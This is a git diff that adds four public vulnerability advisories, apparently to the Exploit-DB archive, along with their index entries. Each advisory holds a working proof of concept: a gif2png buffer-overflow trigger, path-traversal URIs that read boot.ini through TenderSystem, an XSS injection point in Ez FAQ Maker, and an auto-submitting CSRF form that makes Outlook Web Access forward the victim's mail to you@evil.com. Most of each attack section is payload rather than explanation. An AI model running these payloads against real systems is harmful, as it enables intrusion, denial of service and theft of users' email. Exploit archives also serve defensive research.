diff --git a/files.csv b/files.csv
index 0d7dbc7cc..e1c0c9315 100755
--- a/files.csv
+++ b/files.csv
@@ -30940,3 +30940,7 @@ id,file,description,date,author,platform,type,port
 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
+34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0
+34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0
+34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0
+34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0
diff --git a/platforms/linux/dos/34356.txt b/platforms/linux/dos/34356.txt
new file mode 100755
index 000000000..a7073daa5
--- /dev/null
+++ b/platforms/linux/dos/34356.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41801/info
+
+gif2png is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
+
+gif2png 2.5.2 is vulnerable; other versions may also be affected. 
+
+$> ./gif2png $(perl -e 'print "A" x 1053') 
\ No newline at end of file
diff --git a/platforms/php/webapps/34354.txt b/platforms/php/webapps/34354.txt
new file mode 100755
index 000000000..3145541ad
--- /dev/null
+++ b/platforms/php/webapps/34354.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/41792/info
+
+TenderSystem is prone to a multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+TenderSystem 0.9.5 Beta is vulnerable. 
+
+The following example URI's are available:
+
+http://www.example.com/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
+
+http://www.example.com/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html 
\ No newline at end of file
diff --git a/platforms/php/webapps/34357.txt b/platforms/php/webapps/34357.txt
new file mode 100755
index 000000000..93f117be0
--- /dev/null
+++ b/platforms/php/webapps/34357.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41806/info
+
+ScriptsEz Ez FAQ Maker is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+
+Ez FAQ Maker 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/faq/index.php?action=showcat&cid=8&sid="[XSS] 
\ No newline at end of file
diff --git a/platforms/windows/dos/34359.html b/platforms/windows/dos/34359.html
new file mode 100755
index 000000000..4088e4c8e
--- /dev/null
+++ b/platforms/windows/dos/34359.html
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/41843/info
+
+Microsoft Outlook Web Access for Exchange Server 2003 is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
+
+<form name="xsrf" action="http://www.example.com/Exchange/victim_id" method="post" target="_self">
+<input type="hidden" name="cmd" value="saverule">
+<input type="hidden" name="rulename" value="evilrule">
+<input type="hidden" name="ruleaction" value="3">
+<input type="hidden" name="forwardtocount" value="1">
+<input type="hidden" name="forwardtoname" value="guy, bad">
+<input type="hidden" name="forwardtoemail" value="you@evil.com">
+<input type="hidden" name="forwardtotype" value="SMTP">
+<input type="hidden" name="forwardtoentryid" value="">
+<input type="hidden" name="forwardtosearchkey" value="">
+<input type="hidden" name="forwardtoisdl" value="">
+<input type="hidden" name="keepcopy" value="1">
+<body onload="document.forms.xsrf.submit();"> 
\ No newline at end of file